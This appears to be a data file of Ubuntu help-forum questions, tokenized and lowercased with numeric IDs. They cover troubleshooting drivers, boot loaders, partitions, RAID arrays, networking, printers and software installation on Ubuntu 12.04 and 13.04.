304495	password and username recover	i recently bought a ibm thinkpad with ubuntu . i do not know the password . i tried to change it by using the recovery method but when i 'm prompted to enter the new password i ca n't enter anything because the keyboard does n't respond . can someone please help .
304498	keyboard layout changes when i unplug and re-plug external keyboard	i have a notebook with an external keyboard . i want to use `` german ( no dead keys ) '' on both keyboards , but for the external , it keeps resetting if i unplug it . actually , it does not really reset - the change is not shown in settings - > keyboard - but the accent keys are dead . strangely , i can fix that by changing the type between `` generic keyboard with 101 keys '' and `` generic keyboard with 105 keys '' . it does not matter which one i choose , but the change triggers the keyboard layout to be applied again . for the internal keyboard the correct layout is always applied . i 'm on xubuntu 13.04 , xfce 4.10 .
304500	why does this apt package have a four-part version number , with a dash ?	for example , why is the package named linux-headers-3.2.0-45 when actually it represents 3.2.45 ?
304504	having trouble with highpoint raid drivers on ubuntu 12.04 lts	i am building a storage server with the following components : u-nas nsc-800 server chassis adata premier pro sp600 asp600s3-32gm-c 2.5 '' 32 gb sata iii mlc internal solid state drive ( ssd ) asus c8hm70-i/hdmi intel celeron bga1023 intel hm70 mini itx motherboard/cpu/vga combo athena power ap-u1atx50 20+4pin 500 w single 1u eps server power supply - oem highpoint rocketraid 2680 8-channel pci-express x4 sas 3 gbit/s raid controller that 's all good . i built the server , installed ubuntu 12.04 lts 32-bit on the 32 gb ssd , turned it on , ran some updates , and everything seems to work normally . then i tried to add hard drives to the server . i do n't want to set up a raid array per se , for now i just need to connect all of the drives separately so that i can see them separately either in /dev/ or the disk utility . i do n't want any pools or backups , or anything like that , just the individual drives themselves . i believe i 've seen people on different forums referring to this as `` using your raid card as a sata controller '' . the problem is that i went to http : //www.highpoint-tech.com/usa_new/rr2600_download.htm where there are only drivers for ubuntu 11.04 ( that was the start of the problem ) and looked at the installation guide . i was hoping , in vain , that there would be no issue between ubuntu 11.04 drivers and ubuntu 12.04 drivers , but this was not the case . i went through the instructions in the guide , but it did not work because when i added the drives in the pre-bios raid menu they did not appear to be recognized by ubuntu . on top of this , i do not entirely understand how to just add drives to the card so that it sees them as individual drives since the pre-bios menu is pretty unclear . where do i get the ubuntu 12.04 driver ( i do n't really want to go to ubuntu 11.04 , but i can if i absolutely have to ) , and how do i properly add the drives in such a way as to not create a raid , but just treat them as regular drives ? i saw the post rocketraid 26xx driver which seems to be about something similar but for a different raid card model .
304505	boot time is so long	i installed ubuntu on a brand new computer and installed compiz , cairo dock , etc . i also made my unity launcher smaller . now , after just a few days ubuntu needs a long time to load after i logged in and also has a horrible boot time . how can i change this ? i have already reset unity and the time after the login was due to zero but i do n't want such a big launcher . here is a picture of bootchart : http : //s7.directupload.net/images/130605/b56glxyt.png thank you so much for your help !
304506	12.04 still crashes - up to kernel 3.5 ?	when 12.04.02 lts was installed with kernel 3.2 - there seemed to be no problem regarding gdm , x-windows and clamtk . ( i refer to link here : why running clamtk on 12.04 with kernel-update of today crashes the system ? ) now since update with kernel 3.5 - after log-in a gnome-session is switched back to gdm-login when about 20 minutes passed by . or clam-tk with recursive check as user ( whole file-system ) is switched back to gdm-login after the first files . uefi-bios is disabled - with today - but has no effect . after your patched files concerning x-libraries the crash-effect seems to be the same . grub and nvidia-drivers are not involved in this effect . it is located between x-server-xorg and gdm or xdm ?
304511	how do i get a brother hl-2280dw printer working ?	i 'm trying to install brother printer hh-2280dw which i had no problems to do that in ubuntu 12.10 . now i 've decided to switch to ubuntu 12.04 and for some reasons following the same steps it does n't work . i 'm desperate cause lately i need the printer , can i get some help ? i 'm downloading the drivers as you can see i do n't have an option for 32 or 64 bit and i do n't know which from those 2 deb ext is good for me so i have downloaded and tried both , with the specification that the second option is installed but the ubuntu software for some reason after installation it does n't show as it was installed ... i 'm going to printers folder and click add , i chose my printer and click forward and after it supposed to say driver installed but unfortunately i get this : any help will be much appreciated . see also : http : //ubuntuforums.org/showthread.php ? t=2150288
304515	can a partition table be edited from a liveusb of another architecture ?	my purpose is to re-partition a dual-boot machine ( running ubuntu 13.04 / windows 7 ) , i.e . the current table is as follows : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - | | extended partition | | | windows | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | recovery | | ( ntfs ) | swap | filesystem | ( ntfs ) | | | ( swap ) | ( ext4 ) | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - and i want to create an additional ext4 partition under the extended partition , and mount those ( the one i created and the 'filesystem ' partition ) to root and home ( / and /home ) , such as the new layout will be : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - | | extended partition | | | windows | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | recovery | | ( ntfs ) | swap | root | home | ( ntfs ) | | | ( swap ) | ( ext4 ) | ( ext4 ) | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - as the installations on the system and on my live usb differ in architecture , i want to know : is it safe to use a 64bit gparted from a live usb for partitioning a 32bit installation ?
304526	skype 4.2.0.11 crashes on ubuntu 12.04 lts 64bit during video call after receiving im	having an issue with skype crashing while in a video call when anyone sends me an im . i can have a skype video call without any problems for any duration just as long as i do n't receive any im 's during the duration of my video call . the moment that i receive an im , skype is guaranteed to crash within 1 or 2 seconds . searched this site along with others , contacted skype , but i still ca n't get it to work properly . basic computer info : memory : 7.7 gib processor : intel® core™ i7-2630qm cpu @ 2.00ghz × 8 graphics : nvidia geforce gt520m os type : 64-bit disk : 27.1 gb my video card actually does n't come up under system details , finding drivers for that has become a story in itself . hope someone out there knows what 's up and can help me out ! thanks !
304529	no internet connection wireless or wired	i ca n't connect to the internet via wireless network or ethernet i can connect to the router , but when i launch firefox , it tells me i ca n't connect to the server
304533	two ubuntu machines on the same network ca n't communicate	hokay so ... on my home network i 'm running ubuntu 12.04 lts server as a file server . i can ssh in and communicate with that server no problem . i have a home automation panel i wrote for the various devices on the network that was running on the file server . since i have an older lenovo thinkpad sl410 with a broken screen lying around , i decided that i wanted to run the panel on the thinkpad instead of the file server . so i installed ubuntu 13.04 desktop on the lenovo . so far so good . the issue comes in that , for some reason unbeknownst to me , the file server ca n't communicate with the lenovo . from my macbook i can communicate with both . since the macbook is connected to the wifi ( as is the lenovo ) i can only surmise that it is n't an issue with the networking devices , but something with my config . here is a network diagram : just to reiterate : 10.0.0.247 can talk to both 10.0.0.200 and 10.0.0.201 . however , 10.0.0.200 ca n't talk to 10.0.0.201 ( and vice-versa ) . i 've made sure ufw is disabled ( it 's unnecessary internally ) . pings fail with no routing errors , just 100 % failure . ssh times out . traceroute also never gets anyway . ask any clarifying questions and i 'll do my best to answer them ! edit : solved ... a hard router reboot seems to have fixed it . weird !
304535	steam version or standalone version of games ?	i 've purchased a number of games ( mostly through humble bundles ) that have both a linux version on steam and a standalone linux version . would there be any performance benefit to running the games as standalone versions instead of through steam , or are there no differences ? i 'm trying to decide how i want to install my games . if the game is the same with or without steam , i will go with the steam version , so all my games are in the same place and receive updates automatically . if there are performance or other benefits to the standalone versions , then i 'll go with that .
304537	trying to install ubuntu on another computer	i am trying to install ubuntu on a windows xp cumputer that do n't have all the drivers installed so i ca n't go to the internet with it . i am wanting to use my windows 7 desk top to burn a disk so i can put ubuntu on my old xp computer . can you help and give me directions ?
304543	truecrypt read only ubuntu	so i have an issue with truecrypt after moving across from my mac osx . treucrypt file container created in macosx , now living in my ubuntu home folder . now when i mount my truecrypt volume ( asks for tc & ubuntu administrator password ) and tried to write anything to or within it it comes up as an error that the destination is read-only . can read the files as normal . i 've checked the volume properties in truecrypt , - it was not created as a read-only volume . when i mount the volume in truecrypt for each session the 'mount as read-only ' option is not ticked . i 've a feeling this is an ubuntu permissions issue or step that i 'm missing . i 've been mounting from the gui . can anyone please enlighten me as to how to get write priveleges with the mounted container ? thanks in advance
304545	using pkcs # 8 encrypted private keys w/ ssh-agent	i 'm setting up a new ubuntu system ( 12.04.2 lts ) for rails development and wanted to use an encrypted ssh private key as per this article . i can set up a standard ssh keypair using the instructions on github and everything works fine , but when i follow the instructions in the first article i can no longer use ssh to log in . instead , i get the error `` agent admitted failure to sign using the key . '' i 've found a bug ( ca n't post link b/c of low reputation , # 328127 ) that might be related ; i 'm not being asked for my private key passphrase so the fact that i 've modified the private key after creation could be the issue . attempting to add the new key manually using ssh-add only results in the error being returned twice . i 'm not sure how to set $ ssh_auth_sock to zero , otherwise i would try that as well . any help would be greatly appreciated , thanks !
304548	failed to download repository information . check your internet connection .	i changed software & update settings which may be the problem , what does the default for this look like ? i tried sudo apt-get clean , sudo apt-get update , sudo apt-get upgrade . i also tried software-properties-gtk in terminal and it gave me : gpg : /tmp/tmp < somerandom > /trustdb.gpg : trustdb created .
304550	what are the supported devices for ubunu phone ?	are there other supported deviced besides galaxy nexus , nexus 4 , nexus 7 and nexus 10 ? just a quick question and i want to be sure . thanks !
304552	hide `` show wifi password '' ( don let show wifi password )	i 've got to put a wifi password on my school laptops ( all users are admin ) but i do n't want to the children see the password when you go edit conextions and edit de wifi like is see in the pictures . ( i would like that you ca n't tick in the box nยบ3 , so only dots will be seen ) i would like sometihing like this that show key is like watermark so you ca n't see it and this screnshoot was taken in a admin acount ( snox leopard osx ( 10.6.8 ) based with linux ) .
304558	uninstalling grub from uefi laptop	i installed ubuntu alongside windows 8 , however have decided to unisntall ubuntu . first i booted into parted magic and , using gparted deleted all the ext4 and swap partitions . this leaves me with the same partitions i had before i installed ubuntu : /dev/sda1 ntfs winre_drv /dev/sda2 fat32 system_drv ( my uefi partition ) /dev/sda3 fat32 lrs_esp /dev/sda4 unknown microsoft reserved partition /dev/sda5 ntfs windows8_os /dev/sda6 ntfs lenovo /dev/sda7 ntfs pbr_drv i expected deleting the partitions would be enough to remove ubuntu and allow me to boot back into windows 8 , however whenever i boot i get the following error : error : no such partition . which is followed by grub rescue : grub rescue > in my uefi partition , there are two directories boot and efi . in boot is a single file - boot.sdi . in the efi directory are another two directories , boot and microsoft . inside boot are two files , bkpbootx64.efi and bootx64.efi . the microsoft directory has a directory in it named boot . inside it are the normal microsoft efi files ( as far as i can tell ) . thinking there were still grub files left , i ran find . -iname `` *grb* '' and find . -iname `` *grub* '' in the uefi partition , however only found one empty file , bootx64.efi.grb ( which i deleted ) . how is grub still installed , and how can i uninstall it ? i 'm pretty new to uefi and so things may need explained in detail . the computer is a lenovo ideapad z580 . edit : i forgot to mention , i deleted the ubuntu folder in the uefi partition . edit 2 : i managed to get back into windows through a `` system recovery '' option in the laptop 's bios settings . this may or may not have solved the issue . edit 3 : okay , i can boot almost normally now . when i boot , i see no partition active for a couple of seconds then windows boots . how can i remove that ?
304566	how to get graphics card memory info ? windows and linux shows different value	in my windows 8 , video card shows 640 mb of available memory ( screen resolution > advanced settings or with dxdiag ) . but ubuntu ( with lspci command ) shows 256 mb . so who 's right ?
304567	installation - running out of space on the primary hdd can seem the system to find the second hdd ?	i have secondly 6gb installed into the system with nothing on it . i would like to utilize with the primary but ca n't seem to figure out what i need to do in fstab . i 'm sure it something to do with a mount but am lost . any assistance would appreciation .
304569	how to share the workspace for android sdk between windows and ubuntu ?	i 'm sharing one workspace between those two systems , and as i 'm developing for android i need android sdk , which is in windows in d : /android/sdk , on ubuntu it 's different path . how can i make it to switch automatically at windows to d : /.. and on ubuntu to home/ ... ? because now each time i switch systems , i have to point eclipse to the sdk .
304572	install google earth on ubuntu 12.10	i 've tried several times to install google earth for ubuntu 12.10 and keep getting installation errors - usually dependency errors . i 've followed the instructions to a t , and still have yet to get a clean install . i 've used the usual wget command to download the .deb file or used google 's own download file utility , then did a sudo apt-get install google-earth-stable_current_amd64.deb , etc. , etc . also tried for for 32 bit system , still nothing works . does anyone know how to : download a proper and correct .deb file ? to install google earth from that .deb file ? this has become exasperating .
304576	access usb in virtualbox ruinning windows xp	i have windows xp as a guest in virtualbox and ubuntu 12.04 as a host . i want to access the usb from windows xp , so i followed the instructions in this topic : how to access usb in virtualbox running windows xp as guest os i installed the virtualbox from the oracle site , then i installed virtualbox 4.0 oracle vm virtualbox extension pack then i added myself to the vboxusers using this commande : sudo adduser aimad vboxusers but when i go to add the usb i get the message : no devices availaible , as in this picture :
304579	'failed to fetch ' when trying to upgrade using terminal	w : failed to fetch http : //ppa.launchpad.net/s-elser/winelol/ubuntu/dists/raring/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/s-elser/winelol/ubuntu/dists/raring/main/binary-i386/packages 404 not found
304583	what command launches the uefi shell ?	i 'm trying to set up a uefi boot system , and i 've gotten all sorts of wonderful things done , except i ca n't figure out how to launch the uefi shell . efibootmgr did n't work for me , so i need to run a bcfg , and to do that i need to launch the uefi shell . i have the file in the efi partition , but i do n't know how to run it . does anyone here know ?
304585	vmware installation problem	i want to install vmware workstation 9.0.2 on my computer but i keep getting this and i do n't what to do : please enter the user that will initially connect to workstation server . without setting this correctly , you will not be able to share vms with other users . additional users and administrators can be configured later in workstation by selecting `` shared vms '' and clicking ) what do i enter here ? i 'm using ubuntu 13.04 .
304589	downloading things	how do i download things to my computer with ubuntu ? every time i go online to download something like adobe flashplayer or java , it goes into my download folder . i do n't know what to do with it after that . i ca n't activate whatever it is i want to download ! is there an equivalent to an exe file ?
304590	high cpu linked to unresponsive websites ?	i have two websites on an ubuntu server . none of them are responding when i try to access them on a browser . so i sshed into my ubuntu server and ran the top command . i noticed that three processes are constantly using 98 % cpu : 28395 guarddog 20 0 2320 536 424 r 98.0 0.0 17564:52 k 28381 guarddog 20 0 2320 388 276 r 97.7 0.0 19483:56 k 30762 guarddog 20 0 10640 724 576 r 97.0 0.0 19439:21 ka 10950 guarddog 20 0 3049m 2.1g 4324 s 21.8 36.4 31791:33 ruby i am not sure what `` k '' and `` ka '' are . should i kill these processes ? could this be the reason why the sites do not respond on the browser ? i also see that ruby process is using 36.4 percent memory . here is output of uptime as well : uptime 19:10:58 up 173 days , 3:09 , 1 user , load average : 3.94 , 4.14 , 4.23
304592	windows 7 side by side with ubuntu	i have ubuntu already installed . i wanted to get windows 7 as well , i followed the instructions i was given , to partition my hard drive and to format it to a ntfs for windows but now when i try to boot from hdd i only get windows . i am seeing that i was ( if done right ) to get a grub menu at start you , so i may pick which one i would to start up . i would much thankful of your help , also i have no issue with having to flash my hard drive and start from scratch .
304601	how to install ubuntu on my samsung galaxy s2	how to install ubuntu on my samsung galaxy s2 ? i do not know if i understood correctly . can i install ubuntu on a samsung galaxy s2 or is there a program to run on the android ?
304609	update manager onversion 13.04	how to check for updates on version 13.o4 ? there is a setting for updates , but how can i check manually ?
304611	issue with setting up open scene graph ( osg )	i am currently trying to build and install osg . i have installed all the dependencies however when i go to cmake the osg folder i get the following cmake error : cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : opengl_gl_library ( advanced ) how is this library not set ? i am attempting to install on an ubuntu 13.04 in an oracle virtual box .
304616	giving up on windows	i have a toshiba satellite l750d 6 months old , with a now defected windows 7 64 bit sp1 os , a week ago ms sent 60 auto updates , after the upload it went into auto restart and never recovered , i went through the system but could not get it to recover the only open systen was command prompt , my pc seller tells me it does n't come under the warranty because it will be a software problem , toshiba point the finger at the seller , telling me they purchased the warranty , ms failed to answer my problems , so i purchased a ms recovery disc which failed to recover , telling me no operating system could be found , yet i can clearly see the file via command prompt . now i feel my only option is to purchase a new os disk of windows 7 or give up and join the growing dissatisfied ms users . so my question is ... ... . with my new computer in it 's present state only command prompt can i upload ubuntu without having to shell out on the windows disk . however my worry is my files with all my own data and my draft web site i was upgrading for the last month , will i be able to access these or will they be lost .
304622	how is ubuntu/canonical organized ?	ubuntu is a big project that has a lot of community involvement over many different aspects . from who is in charge - to how decisions are made . how is the work on ubuntu organized and who organizes it ?
304623	need help with ubuntu cloud	i am looking to start a cloud storage service and i was looking at ubuntu to do that , but i need to know how the public and or clients can signup and use my cloud servers . can anyone tell me where to go or what is the best to use for this ? thanks
304625	i need a simple easy reliable sound control tool	what is a simple , foolproof configuration for sound playing on speakers , a simple jukebox or playlist-player , a volume control onscreen , and input through the microphone jack ? i currently have sound but no onscreen control . i did get youtube to record sound ; not sure how it is working now though . re-configuring sound has become a second life . do i want to use jack ? pulse ? alsa ? something else ? i am running 12.04 , with gnome menu instead of unity , on a dell optiplex gx-280 , using the built-in sound . update june 2013 : after recent update manager updates , the sound control applet re-appeared in the top menu line . the `` pulseaudio volume control '' is in the menus , i can turn up and down all apps separately there . i also can kill my sound by testing out different settings - turns out a wrong move also zeroes out the level on an app . i have n't installed , built , or edited a .conf lately , and it works ! alsa , and pulse , are running , and not jack . later in june ( this probably s/b a blog by now ... ) : music player rhythmbox is 100 % ok. sound from most websites is spot-on , but not when playing on chess.com . it is supposed to be silent except for making sound effects for each move . the page is a large amount of javascript . in the volume control app , i can see that chrome appears on the playback tab , then disappears a few seconds later . when the next move comes soon enough , the sound plays , but once it disappears from the playback tab , the next sound is lost .
304626	how to open a ruby file in terminal ?	i have a ruby file saved on my desktop as test.rb . how can i open it with terminal ? i have already tried to use /home/desktop/test.rb and what i get in response is bash : /home/desktop/test.rb : no such file or directory .
304629	ca n't extend desktop to second monitor	i have a vostro 200 , intel pentium d ( e2160 ) processor and intel g31/g33 video adapter . the video adapter is integrated and i 'm using a vga splitter to connect to monitors . the monitors are samsung 19 '' widescreen syncmasters . i have ubuntu 13.04 installed , running the mate desktop environment . both monitors are working , but the second one is cloning the first one . it wo n't let me extend the desktop . when i open the monitor preferences screen and click on the detect monitors button , it does n't do anything . it only detects one monitor . does anyone have any ideas of what i can try to get the desktop extended to the second monitor , instead of cloned ? thanks .
304635	keyboard navigation/search for all ui elements	i have recently found out about shortcat , an osx app that allows for keyboard-only control of any application that has accessibility features turned on . i vaguely remember gnome do and docky planning to head in that direction , and i am not sure what came of it with gnome shell -- -i tried searching just now and found nothing . does anyone know if this is possible to do in linux ? is there such a app , or something similar , at least in spirit ?
304636	need help installing bluegriffon	i 'm having trouble figuring out how to install bluegriffon . all the other programs i 've installed have been easily found in the software center or were a .deb that opened into the software center , but bluegriffon 's download is a .tar.bz2 and i tried to look for information on how to use that but it was all outdated and did n't help . so if possible could anyone please just give me a walk-through on how to install this and get it running ? thank you for your time . /edit : ran ls ~/downloads/bluegriffon and this resulted :
304640	studio : non-functioning wifi drivers	i just installed ubuntu studio , it 's all working fine except my wifi . in `` software & updates '' i have installed the proprietary bcm4313 802.11/b/g/n driver but no wireless internet options appear . i can only access internet if i am using ethernet . please help !
304641	ubuntu 13.04 will not boot after install ?	so i got ubuntu 13.04 to install using my onboard video card but what i want is my nvidia geforce 8400 gs to be my main video card but when i turn it on in bios ubuntu will not boot . any ideas on how i can fix this problem ? thanks in advance
304642	trying to mount windows partition - get failed to mount : < path > is a directory	i 'm trying to mount a windows partition . i 'm running ubuntu 12.04 on a usb drive , and want to mount the internal hard drive of the laptop it 's connected to , which has windows 7 installed . i typed : sudo mount -t ntfs-3g /media/windows /dev/sda3 i got a couple of error messages saying : error opening : '/media/windows ' is a directory failed to mount : '/meda/windows ' is a directory i just did this successfully on a different windows pc last night . i 'm not sure what 's going wrong .
304643	how to enforce ipv6 source address selection with addrlabel at startup ?	i have a system with a primary ip address of 2001 : db8:1 : :1/64 . this ip is achieved via stateless auto config and is static for our purposes . this system has a routed ip block of 2001 : db8:2 : :/64 . i would like to ensure that by default , all ipv6 traffic originating from the system uses 2001 : db8:1 : :1 . ( applications could override this with a specific source binding . ) the best way to do this appears to be , from my research , to run ip addrlabel add prefix 2001 : db8:1 : :1/128 label 1 ip addrlabel add prefix 2001 : db8:2 : :/64 label 99 what would be a proper ubuntu way to have this run at startup ? thanks to anders input i was able to do this by adding the following lines , in /etc/network/interfaces up /sbin/ip addrlabel add prefix 2001 : db8:1 : :1/128 label 1 up /sbin/ip addrlabel add prefix 2001 : db8:2 : :/64 label 99 ... down /sbin/ip addrlabel del prefix 2001 : db8:1 : :1/128 label 1 down /sbin/ip addrlabel del prefix 2001 : db8:2 : :/64 label 99 this works great , and also covers clean-up if the interface is brought down .
304645	ssh tunnel in and connect to local machine	have a server setup and i can ssh in with putty via port forward and open a gui page , and webmin and command line . once i have logged in , i want to be able to access other ip addresses via web page on that network . webmin http tunnel will allow access to outside webpages , but can not access any addresses on the same network . is this even possible ?
304650	test page prints in color , but libreoffice and idle do not	i have an epson stylus nx430 . my test page prints great from ubuntu , will all colors . however , libreoffice and idle only print black and white . i do n't even have a color option in libreoffice writer to print in red , for examp
304660	skype wo n't install in ubuntu 12.10	skype will not fully install because `` some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : skype : depends : skype-bin e : unable to correct problems , you have held broken packages . obviously , i do n't understand the basic gibberish of ubuntu , can anyone suggest what 's going on ?
304662	can i set up an openvpn server in 12.04 w/o openvpn access server ?	dear askubuntu community members , i 've got a ubuntu desktop 12.04 at my house , not doing much but hosting about three or four printers for my home network . it 's a relatively powerful machine , using a sandy bridge intel processor and in a very well-ventilated location . it 's connected to a trendnet router via ethernet , and i 've got one desktop i use for gaming also hooked up via ethernet . apart from that , i 've got a macbook pro i travel with fairly often and an iphone 5 ( not jailbroken ) . i 'd like to set up an openvpn server on that ubuntu machine for all of my machines to hook up to ( i travel fairly often ) , but sadly discovered the hard way that if i opted for the easy path of openvpn access server i 'd have to fork out more money than i really want to . anyone willing to help me out ?
304667	ca n't launch my-weather-indicator	i 've installed my-weather-indicator software using these commands : sudo add-apt-repository ppa : atareao/atareao sudo apt-get update sudo apt-get install my-weather-indicator however , i ca n't find it in my system . waiting for your help . thanks .
304669	installed webcamstudio does n't open in my ubuntu 12.04 lts	first i have installed webcam studio using webcamstudio_0.56-1~getdeb2_all.deb with software center . it was installed without error messages . but could n't run /open with double-click the dash home icon . then i uninstalled it , and cleaned the computer with tweaks . then again installed using terminal , with following commands . sudo add-apt-repository ppa : upubuntu-com/multimedia sudo apt-get update sudo apt-get install webcamstudio there was a message warning that -e should have -e or -f. but however it was installed . still i can not open it with double-click the dash home icon . please help . thanks .
304672	how to re-add accidentally removed hard drive in raid5	i have a nas on ubuntu server with 4 2tb hard drives in raid 5 . a couple of weeks ago , one of the hard drives died , but my raid was working , although degraded . luckily it was still under warranty and i was sent a new hard drive which i installed today . however , when trying to add the new hard drive into the raid , it was not rebuilding . so i unplugged the hard drive and rebooted the machine . however , i accidentally set one of my other hard drives in the raid to fail and removed it using mdadm . now it says my raid has two removed hard drives . i still have my 3rd hard drive with all my data still intact , but i do n't know how to re-add it back into the raid array , so it 's back to a good ( although degraded ) state , so i can continue to add the 4th hard drive and rebuild the array . is it possible to just have ubuntu realize that the 3rd hard drive has my data and just have it recognized as part of the array again ? when i try to run : sudo mdadm -- manage /dev/md127 -- re-add /dev/sdd1 , it says `` mdadm : -- re-add for /dev/sdd1 to dev/md127 is not possible . please , any help that anyone can give would be much , much appreciated .
304676	about installing usb modem	i am using ubuntu 11.in which if i plug in my visiontek usb modem it is not detected.please help me..how to use the modem in ubuntu and give me the steps ? !
304677	ubuntu/winboot/wubildr.mbr missing	i have pre-installed windows 8 in my lenovo laptop . i have ordered an dvd of ubuntu 13.04 from ebay . i have installed it along with windows 8 . but in boot menu when ever i choose ubuntu it gives an error that ubuntu/winboot/wubildr.mbr missing . there is some extra texts and ubuntu does n't get start . i have searched on web . lots of people are having the same problem . found some answered also but all are confusing and unable to use them . can any one give perfect solution ? do not give ubuntu commands because ubuntu is n't opening . i 've tried here : installing ubuntu on a pre-installed uefi supported windows 8 system but it is n't working for me because ubuntu is already installed in pc . please help .
304679	ubuntu wo n't always load	i 'm going to give you the short of it , since trying to register with this site has deleted what i spent 10 minutes typing . i 'm dual booting ubuntu 13.04 and windows 8 . usually , when i try to start ubuntu , i get a black screen with something to the tune of : kvm : disabled by bios bad io at port [ x ] bad io at port [ x ] etc . when this happens , my computer fan will speed up , and the computer turns off after a time . in addition , i need to change my bios settings to switch oses . i do n't know if this is normal . windows 8 wo n't boot on legacy , ubuntu only boots on legacy . also : sometimes windows wo n't boot . this has only happened after installing ubuntu .
304682	sound is muted on start up	system sound is muted by default after startup even if i did n't set it muted before shutting down . i 'm using ubuntu 13.04 x64 bit in my hp pavilion g6 . how do i track this problem ? how this can be solved ?
304684	speaker gives noise in ubuntu . solution ?	i 've recently moved to ubuntu 13.04 from windows 8 . i 've got problem as speaker producing unnecessary noise why is this ? what is the solution ?
304686	cant get connected to wired/wireless network	i m using ubuntu 12.04 lts version on my asus laptop ( 64bit ) . my problem is that i cant get connected to network ( wifi/wired lan ) . system not showing any connections which are available . but i can get internet through a wireless usb modem . what i m missing here ? ? ? ? rfkill list all 0 : asus-wlan : wireless lan soft blocked : yes hard blocked : no 1 : asus-bluetooth : bluetooth soft blocked : no hard blocked : no 4 : phy2 : wireless lan soft blocked : no hard blocked : no i tried this- sudo rfkill unblock all still no change . plz replay ... .thnx
304687	some applications do n't open in ubuntu 12.04 lts ( 64 bit )	following applications those installed does n't open in my ubuntu 12.04 lts system . crebs ( installed with : sudo add-apt-repository ppa : crebs/ppa ; sudo apt-get update ; sudo apt-get install crebs ) ubuntu tv -unity 2d ( installed with : sudo apt-get -y build-dep unity-2d ; sudo add-apt-repository ppa : u2t/bleedingedge ; sudo apt-get update ; sudo apt-get -y install unity-2d-shell ) video 4 linux ( installed with : sudo add-apt-repository ppa : libv4l/ppa ; sudo apt-get update ; sudo apt-get install gtk-v4l ) ffmpeg ( installed with : adding followings to `` /ect/apt/sources.list '' ... . ; deb http : //eu-west-1.ec2.archive.ubuntu.com/ubuntu/ precise multiverse ; deb-src `` '' '' '' '' precise multiverse ; deb `` '' '' '' '' precise-updates multiverse ; deb-src `` '' '' '' '' precise-updates multiverse : ... .then running : sudo apt-get update ; sudo apt-get install libfaac-dev ) webcamstudio ( installed with : sudo add-apt-repository ppa : upubuntu-com/multimedia ; sudo apt-get update ; sudo apt-get install webcamstudio ) i installed ubuntu with downloaded `` ubuntu 12.04.2 lts amd64.iso '' file from www.ubuntu.com . updates have done with update manager also . i am the administrator and only user . i installed above packages with root prompt `` # '' ( running `` $ sudo su '' ) . this is a `` toshiba satellite c650 '' laptop with `` intel® core™ i3 cpu m 380 @ 2.53ghz × 4 `` , 500 gb hard disk , 2 gb ram , and `` intel® ironlake mobile '' graphics . this is the only operating system in the computer . i am doing videography and do n't know much about computing . i need expert help ! .
304689	ubuntu 12.04 installed on a 50gb partition , i 've used 18 , and im told i am full . help ?	i noticed a problem trying to install software with both sudo apt-get ( etc . ) and the software center , and after using sudo dpkg -- configure -a i am returned dpkg : error : failed to write status database record about 'empathy-common ' to '/var/lib/dpkg/status ' : no space left on device so i try df -h be forewarned , i 'm a complete linux noob , so i 'm sorry if this is a face-palm kind of question . thanks for the help ! edit1 : edit2 : thanks for all you 're help guys ! it 's been so long since i installed ubuntu that i completely forgot i used wubi . looking at it again , i can see that it defaults to giving ubuntu only 17 gb . i can see now that i ignored that setting . i am currently reinstalling ubuntu with a larger ... group ( ? ) .
304693	lubuntu on aspire one 725 without touchpad	i have just bought an 'acer aspire one 725-c7cbb 11.6 '' amd c-70 2gb 320gb radeon hd7290 linux blue ' . the net book had linpus installed . i immediately installed lubuntu 13.04 from an external usb dvd-writer . during the installation the touchpad did not work . i do not have a usb mouse . i managed to complete the installation using the cursor keys . lubuntu 13.04 installed ok but still the touchpad is not working . i have installed lubuntu in another laptop alongside windows and the touchpad worked with no problem . should i install firstly a pirate windows copy to the 725 to get the touchpad drivers and then lubuntu ?
304696	why can not use git commit -m ?	i tried to commit change and add comment : $ git commit -am `` update calculator clear and reset '' -- amend commit failed : ( use 'git commit ' or 'git commit -a ' to commit changes ) ( can not use 'git commit -m ' ) why ?
304699	how to share installed packages across different os partitions ?	my laptop hard-disk has several os partitions , e.g . 1. sda6 - 500gb ( used for storing all my data ) 2. sda3 - ubuntu 10.04 3. sda4 - linux mint 4. sda5 - ubuntu 12.04 i end up installing duplicate packages across all these similar operating systems . how can i install the various packages e.g . 'vim ' , 'tmux ' , 'mutt ' etc . only once , i.e do only one time installation on disk ? that way , if i plan to reinstall ubuntu , i do n't have to reinstall all the packages . as an analogy , on windows i can install a software on a usb stick , and can run it from there itself . i can re-install windows or use a different version , but the software will still work .
304706	how to make my ubuntu auto-shutdown after successful update ?	using a edge for update is really not cool but i have to . so my update always runs in night when i go to sleep . is there any way to set ubuntu to auto-shutdown after completion of update . note : i saw a link in a similar post that redirects to a python script ( see here ) but i am not well acquainted with these kind of scripts . any help would be appreciated .
304712	sync iphone contacts to ubuntu	i have followed this link but i am getting following error nameerror : global name 'iphone ' is not defined . how to resolve ? i am also getting this error : traceback ( most recent call last ) : file `` ./iphonesync.py '' , line 153 , in application = application ( ) file `` ./iphonesync.py '' , line 67 , in __init__ if not agent.connect ( uuid ) : file `` /home/mobile/python-idevicesync/iphonesyncagent.py '' , line 25 , in connect self._phone = idevice ( )
304713	overheating problem with ubuntu , lubuntu and point mate in my netbook medion akoya e1222	hello my name is alex and i have a medion netbook a e1222 with a intel atom n450 and 2gb of ddr2 ram and a intel gma 3150 and when i installed ubuntu 10.04 , 12.04 , 13.04 , lubuntu 13.04 and point linux mate it overheats to 78째 c. i tried everything cleaning fans , installed mate , i installed google chrome and desinstalled firefox . i installed lubuntu the forums tell my that is a low resources os but every time i have overheating problems . what can i do . i want to use linux i hate windows . please help me .
